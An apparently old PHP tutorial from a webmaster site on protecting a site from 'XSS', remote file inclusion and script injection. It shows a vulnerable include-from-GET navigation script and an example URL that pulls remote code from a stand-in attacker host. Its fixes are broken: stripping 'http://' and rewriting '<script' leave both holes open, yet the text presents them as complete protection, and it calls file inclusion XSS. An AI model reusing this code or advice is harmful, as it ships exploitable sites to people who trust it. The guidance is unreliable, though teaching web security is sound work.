AvengeX Webmaster Development - Free PHP, MySQL, CSS, XHTML, Photoshop Tutorials

This tutorial will simply go through a few ways to secure your PHP site further.

Introduction - Double yew tay eff is XSS?

XSS is known as cross site scripting, and sometimes known as CSS. I prefer to use XSS as CSS has many meanings now.

If you've heard of PHP injection, it's somewhat similar to that, only that you can add in scripts and if your navigation system is that bad, a XSS'er can get shell access to your server if you don't have the right mods to Apache installed!

AvengeX was a victim of XSS a while back, but I took a few simple steps to make sure that it wouldn't be attacked like this again.

Step One:

Check through your PHP navigation script. If you have navigation which is like ?id=module&page=application, then this is good. Though, if you use ?x=whatever, that has this sort of thing:<?php $page = $_GET[x].".php";

include($page); ?> then your site is vulnerable. This means people could simply add this to the URL: ?x=http://www.evil-script.com/that/kills/your/site/hack, and then it'd include hack.php. Not good eh? So, the easiest way is just to take out the http bit. Your new code:<?php

$page = $_GET[x].".php";

$page = str_replace('http://','',$page);

include($page);

?>



Step Two:

Do you prevent SQL injection? If not, you should do. Don't know how? Check out a2z's useful tutorial on user input securing



Step Three:

Javascript injection is the next best thing after SQL injection. What people can do:

- Cookie stealing

- Site redirecting

- Endless alerts

- Much, much more.

So when you're outputting from your database, all you have to do is stop the script tag:<?php

$query_data = preg_replace("#<script#is","<|script",$query_data);

echo $query_data;

?>

Notice I used preg_replace here, modifiers I used have one important function each:
~ the i switch checks the case of any letter in script, as if we used str_replace it would only go for lowercase, or whichever case we have used.
~ the s switch checks for it spread out over multiple lines. Some sites, (namely MySpace.. hahaha..), were exploited by typing <script> over multiple lines. Some browsers, (namely IE6.. hahaha..), would interpret this as a script tag and then run the code.



Congratulations..

You're halfway there. Now you've done everything you can to your site to stop XSS, you've now got to have a talk with your host and ask if mod_security is installed on the server.



Mod_Security - What is it?

To put it as simply as I can, it's an Apache module that stops any dodgy things happening to the server. If anything does happen, it normally stops them and it logs it. It's a must have Apache module, so any server without it is like living without your genitals, or something like that. Sorry to put it in such a term, thought it would make an impact.



Where does my host get it?

Check out the Apache Modules website and look for it there, or go to Modsecurity.org/download to get it straight away.





That's about it, happy coding!



Will

---